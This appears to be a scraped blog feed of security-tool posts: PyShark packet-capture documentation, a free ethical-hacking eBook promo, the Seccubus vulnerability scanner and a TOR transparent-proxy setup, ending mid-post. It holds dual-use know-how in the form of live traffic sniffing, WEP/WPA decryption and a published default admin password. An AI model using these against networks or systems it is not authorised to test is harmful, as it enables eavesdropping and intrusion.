Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>All Platforms</b><br />
<br />
Simply run the following to install the latest from pypi<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install pyshark</span><br />
<br />
Or install from the git repository:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/KimiNewt/pyshark.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd pyshark/src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python setup.py install</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Mac OS X</span></h3>
You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">xcode-select --install</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install libxml</span><br />
<br />
You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
Reading from a capture file:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> import pyshark</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><FileCapture /tmp/mycapture.cap (589 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> print cap[0]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Packet (Length: 698)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Layer ETH:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Destination: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Source: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Type: IP (0x0800)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Layer IP:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Version: 4</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Header Length: 20 bytes</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Total Length: 684</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Identification: 0x254f (9551)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Flags: 0x00</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Fragment offset: 0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Time to live: 1</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Protocol: UDP (17)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Header checksum: 0xe148 [correct]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Source: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Destination: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ...</span><br />
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Other options</span></b></h3>
<ul style="text-align: left;">
<li><b>param keep_packets:</b> Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.</li>
<li><b>param input_file:</b> Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.</li>
<li><b>param display_filter: </b>A display (wireshark) filter to apply on the cap before reading it.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol: </b>Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.</li>
<li><b>param tshark_path: </b>Path of the tshark binary.</li>
</ul>
<div>
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Reading from a live interface:</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.LiveCapture(interface='eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><LiveCapture (5 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture[3]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><UDP/HTTP Packet></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">for packet in capture.sniff_continuously(packet_count=5):</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> print 'Just arrived:', packet</span><br />
<br />
<b><span style="color: #073763;">Other options</span></b><br />
<ul style="text-align: left;">
<li><b>param interface:</b> Name of the interface to sniff on. If not given, takes the first available.</li>
<li><b>param bpf_filter: </b>BPF filter to use on packets.</li>
<li><b>param display_filter: </b>Display (wireshark) filter to use.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol: </b>Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path: </b>Path of the tshark binary</li>
<li><b>param output_file:</b> Additionally save captured packets to this file.</li>
</ul>
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Reading from a live interface using a ring buffer</span></b></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.LiveRingCapture(interface='eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><LiveCapture (5 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture[3]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><UDP/HTTP Packet></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">for packet in capture.sniff_continuously(packet_count=5):</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> print 'Just arrived:', packet</span><br />
<br />
<b>Other options</b><br />
<ul style="text-align: left;">
<li><b>param ring_file_size:</b> Size of the ring file in kB, default is 1024</li>
<li><b>param num_ring_files:</b> Number of ring files to keep, default is 1</li>
<li><b>param ring_file_name:</b> Name of the ring file, default is /tmp/pyshark.pcap</li>
<li><b>param interface:</b> Name of the interface to sniff on. If not given, takes the first available.</li>
<li><b>param bpf_filter: </b>BPF filter to use on packets.</li>
<li><b>param display_filter:</b> Display (wireshark) filter to use.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol:</b> Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key:</b> Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type:</b> Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path: </b>Path of the tshark binary</li>
<li><b>param output_file:</b> Additionally save captured packets to this file.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Reading from a live remote interface:</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<br />
<b>Other options</b><br />
<ul style="text-align: left;">
<li><b>param remote_host: </b>The remote host to capture on (IP or hostname). Should be running rpcapd.</li>
<li><b>param remote_interface: </b>The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).</li>
<li><b>param remote_port:</b> The remote port the rpcapd service is listening on</li>
<li><b>param bpf_filter: </b>A BPF (tcpdump) filter to apply on the cap before reading.</li>
<li><b>param only_summaries: </b>Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol:</b> Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path:</b> Path of the tshark binary</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Accessing packet data:</span></h3>
Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.<br />
<br />
<div style="text-align: left;">
<b>All of the following work:</b></div>
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet['ip'].dst</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.1</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet.ip.src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.100</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet[2].src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.100</span><br />
<br />
<b>To test whether a layer is in a packet, you can use its name:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> 'IP' in packet</span><br />
<span style="background-color: #f3f3f3; color: blue; font-family: "courier new" , "courier" , monospace;">True</span><br />
<br />
To see all possible field names, use the <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">packet.layer.field_names</span> attribute (i.e. <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">packet.ip.field_names</span>) or the autocomplete function on your interpreter.<br />
<br />
<b>You can also get the original binary data of a field, or a pretty description of it:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.showname</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Source or Destination Address: 10.0.0.10 (10.0.0.10)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># And some new attributes as well:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.int_value</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">167772170</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.binary_value</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">'\n\x00\x00\n'</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Decrypting packet captures</span></h3>
Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')</span><br />
<br />
A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">('wep', 'wpa-pwd', 'wpa-psk')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">('wep', 'wpa-pwd', 'wpa-psk')</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Python2 deprecation - </span></h3>
This package no longer supports Python2. If you wish to still use it in Python2, you can:<br />
<br />
<b>Use version 0.3.8</b><br />
<br />
<ul style="text-align: left;">
<li>Install pyshark-legacy via pypi</li>
<li>Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.</li>
</ul>
<br />
<br />
Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.<br />
<br />
There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.<br />
<br />
<div style="text-align: left;">
This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.</div>
<h3 style="text-align: left;">
<span style="color: #073763; font-size: large;"><a href="https://github.com/KimiNewt/pyshark/archive/master.zip" target="_blank">Download Pyshark</a></span></h3>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-43436215307871506432019-07-11T00:58:00.000+05:302019-07-11T00:58:41.147+05:30Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDCRmMc0_BqxdcVr54nTyegWNVCPlvM0jao2aR7R48i_18yrcth8xJwNKnZJTbTjOC6ksIyjnLlEr016AgbBk-Q_zPfKrzPi5S-RmTSoNhW1JiOi6jfm4wCmNEu5bRZVhHgsE3xmTXpxHF/s1600/LEARN+ETHICAL+HACKING.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="385" data-original-width="718" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDCRmMc0_BqxdcVr54nTyegWNVCPlvM0jao2aR7R48i_18yrcth8xJwNKnZJTbTjOC6ksIyjnLlEr016AgbBk-Q_zPfKrzPi5S-RmTSoNhW1JiOi6jfm4wCmNEu5bRZVhHgsE3xmTXpxHF/s640/LEARN+ETHICAL+HACKING.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"</span></h2>
<br />
Learn how to hack systems like black hat hackers and secure them like security experts.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">This eBook will help you:</span></h3>
<ul style="text-align: left;">
<li>Understand ethical hacking and the different fields and types of hackers</li>
<li>Set up a penetration testing lab to practice safe and legal hacking</li>
<li>Explore Linux basics, commands, and how to interact with the terminal</li>
<li>Access password-protected networks and spy on connected clients</li>
<li>Use server and client-side attacks to hack and control remote computers</li>
<li>Control a hacked system remotely and use it to hack other systems</li>
<li>Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections</li>
<li>Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!</li>
</ul>
<br />
Free offer expires 07/23/19.<br />
<br />
Offered Free by: Packt<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://hackersonlineclub.tradepub.com/free/w_pacb101/prgm.cgi" style="margin-left: auto; margin-right: auto;" target="_blank"><img alt=" DOWNLOAD NOW!" border="0" data-original-height="603" data-original-width="418" download="" now="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWnNFF2NOlqQmGQYqONhXImO33S1Y3tSQN_JSZVmRIXLtp5oQ72C1PN3ZvTCvz-9m6QNjS6Pww9G9xbwOgEaGFDOy8O-PxWlnKG98hYvEAKvub5rIu88g1Qv4icXW5q_rpFbH1oDXBQi2t/s1600/Learn+Ethical+Hacking+from+Scratch.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://hackersonlineclub.tradepub.com/free/w_pacb101/prgm.cgi" target="_blank"><b><span style="font-size: large;">DOWNLOAD NOW</span></b></a></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-4033319510943693642019-06-21T19:35:00.000+05:302019-06-21T19:35:25.974+05:30Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7MQR2_QkHX4gL5uU7NAq7oIDdd_ytEpOdZzAsGGRQRrRUU3LrgMTVIlLyWzrI5Kns9cxr7suxtvBp8SGpd1yIjaP0xapO-A51jUbp6PHmgtcmsJU4UAdsXvj680dqiKrkv4UKc1Suotom/s1600/Seccubus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="593" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7MQR2_QkHX4gL5uU7NAq7oIDdd_ytEpOdZzAsGGRQRrRUU3LrgMTVIlLyWzrI5Kns9cxr7suxtvBp8SGpd1yIjaP0xapO-A51jUbp6PHmgtcmsJU4UAdsXvj680dqiKrkv4UKc1Suotom/s1600/Seccubus.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.</span></h3>
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.<br />
<br />
On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.<br />
<br />
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.<br />
<br />
<b>Seccubus V2 works with the following scanners:</b><br />
<ul style="text-align: left;">
<li>Nessus</li>
<li>OpenVAS</li>
<li>Skipfish</li>
<li>Medusa (local and remote)</li>
<li>Nikto (local and remote)</li>
<li>NMap (local and remote)</li>
<li>OWASP-ZAP (local and remote)</li>
<li>SSLyze</li>
<li>Medusa</li>
<li>Qualys SSL labs</li>
<li>testssl.sh (local and remote)</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Docker</span></h3>
Available images.<br />
<br />
<b> Image name<span style="white-space: pre;"> </span> Purpose<span style="white-space: pre;"> </span> </b> <br />
<ul style="text-align: left;">
<li><a href="https://microbadger.com/images/seccubus/seccubus" target="_blank">seccubus<span style="white-space: pre;"> </span></a> Run a full Seccubus stack in a single container<span style="white-space: pre;"> </span></li>
<li><a href="https://microbadger.com/images/seccubus/seccubus-front" target="_blank">seccubus-front</a><span style="white-space: pre;"> </span> Serving just the front end HTML, javascript and css<span style="white-space: pre;"> </span></li>
<li><a href="https://microbadger.com/images/seccubus/seccubus-web" target="_blank">seccubus-web</a><span style="white-space: pre;"> </span> Serving front and code and API simultaniously<span style="white-space: pre;"> </span></li>
<li><a href="https://microbadger.com/images/seccubus/seccubus-api" target="_blank">seccubus-api</a><span style="white-space: pre;"> </span> Serving just the API.<span style="white-space: pre;"> </span></li>
<li><a href="https://microbadger.com/images/seccubus/seccubus-perl" target="_blank">seccubus-perl</a><span style="white-space: pre;"> </span> Running command line scripts, e.g. to scan<span style="white-space: pre;"> </span></li>
<li><a href="https://microbadger.com/images/seccubus/seccubus-cron" target="_blank">seccubus-cron</a><span style="white-space: pre;"> </span> Running cron deamon to execute scans</li>
</ul>
<br />
<span style="white-space: pre;"> </span><br />
Information about the docker containers is <a href="https://github.com/seccubus/seccubus/blob/master/README-docker.md" target="_blank">here</a><br />
<br />
<b>Default password, changing it.</b><br />
<br />
After installation the default username and password for seccubus is:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">admin / GiveMeVulns!</span><br />
<br />
It is highly recommended you change this after installation.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/bin/seccubus_passwd -u admin</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/seccubus/seccubus" target="_blank">Download Seccubus</a></span><br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-66946632665084257042019-06-12T16:30:00.001+05:302019-06-12T16:30:46.408+05:30TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCWELYjeeJdRk0gEmKt5e1Z9uajvKq2wJ07UkZiBDqksoCrCbYHvCfqilY2i2YxH4_nC8lMULjhQTwwNb3KvxuODjiRbtrs6Hl5Lzt6BiH9Wb7prX8p-UV8AP8Q-DbZjVY1VgU0ia4hOo/s1600/Tor+Project.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="725" data-original-width="1200" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCWELYjeeJdRk0gEmKt5e1Z9uajvKq2wJ07UkZiBDqksoCrCbYHvCfqilY2i2YxH4_nC8lMULjhQTwwNb3KvxuODjiRbtrs6Hl5Lzt6BiH9Wb7prX8p-UV8AP8Q-DbZjVY1VgU0ia4hOo/s640/Tor+Project.png" width="640" /></a></div>
<br />
<b>TOR Router- </b>A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.<br />
<br />
Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.<br />
<br />
TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Script to install on distros using SystemD only</span></h3>
If you are using BlackArch Linux <span style="color: blue;">(https://blackarch.org</span>) you can install the script from the repos using the following command:<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># pacman -S tor-router</span><br />
<br />
<b>To install from source:</b><br />
<br />
Note that you need BASH, not sh<br />
<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.<br />
<br />
<b>It script require root privileges</b><br />
<br />
1. Open a terminal and clone the script using the following command:<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files</span><br />
<br />
2. Put the following lines at the end of /etc/tor/torrc<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># Seting up TOR transparent proxy for tor-router</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">VirtualAddrNetwork 10.192.0.0/10</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">AutomapHostsOnResolve 1</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">TransPort 9040</span><br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;">DNSPort 5353</span><br />
<br />
3. Restart the tor service<br />
4. Execute the tor-router script as root<br />
<span style="background-color: #f3f3f3; color: #38761d; font-family: Courier New, Courier, monospace;"># sudo ./tor-router</span><br />
<br />
5. Now all your traffic is under TOR, you can check that in the following pages: <span style="color: blue;">https://check.torproject.org</span> and for DNS tests: <span style="color: blue;">https://dnsleaktest.com</span><br />
<br />
6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Uninstalling/Stoping</span></h3>
Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Proof of concept</span></h3>
After of run the script, follow the next steps to ensure that all is working as expected:<br />
<br />
<b>IP hidden and TOR network configured: </b><br />
Visit <a href="https://check.torproject.org/" target="_blank">https://check.torproject.org</a>, you should see a message like it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwdSBRov5WnI6tRRwGcBKErjtiavTknwWUurnnkJ-Ugr0fX7H404BqaG_V-DrjPJoqZMZPiSb8x2z0l01Vh8o0Hekb1bbmX81SgJv3B7klYszGKf_WmOWgtPt0ch6Z9qckhyOUOFKvGm1j/s1600/Tor+Router+POC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1360" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwdSBRov5WnI6tRRwGcBKErjtiavTknwWUurnnkJ-Ugr0fX7H404BqaG_V-DrjPJoqZMZPiSb8x2z0l01Vh8o0Hekb1bbmX81SgJv3B7klYszGKf_WmOWgtPt0ch6Z9qckhyOUOFKvGm1j/s640/Tor+Router+POC.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Checking DNS Leaks: </b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Visit <a href="https://dnsleaktest.com/" target="_blank">https://dnsleaktest.com</a> and make a extended test to see what are your DNS. You shloud get some like it:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
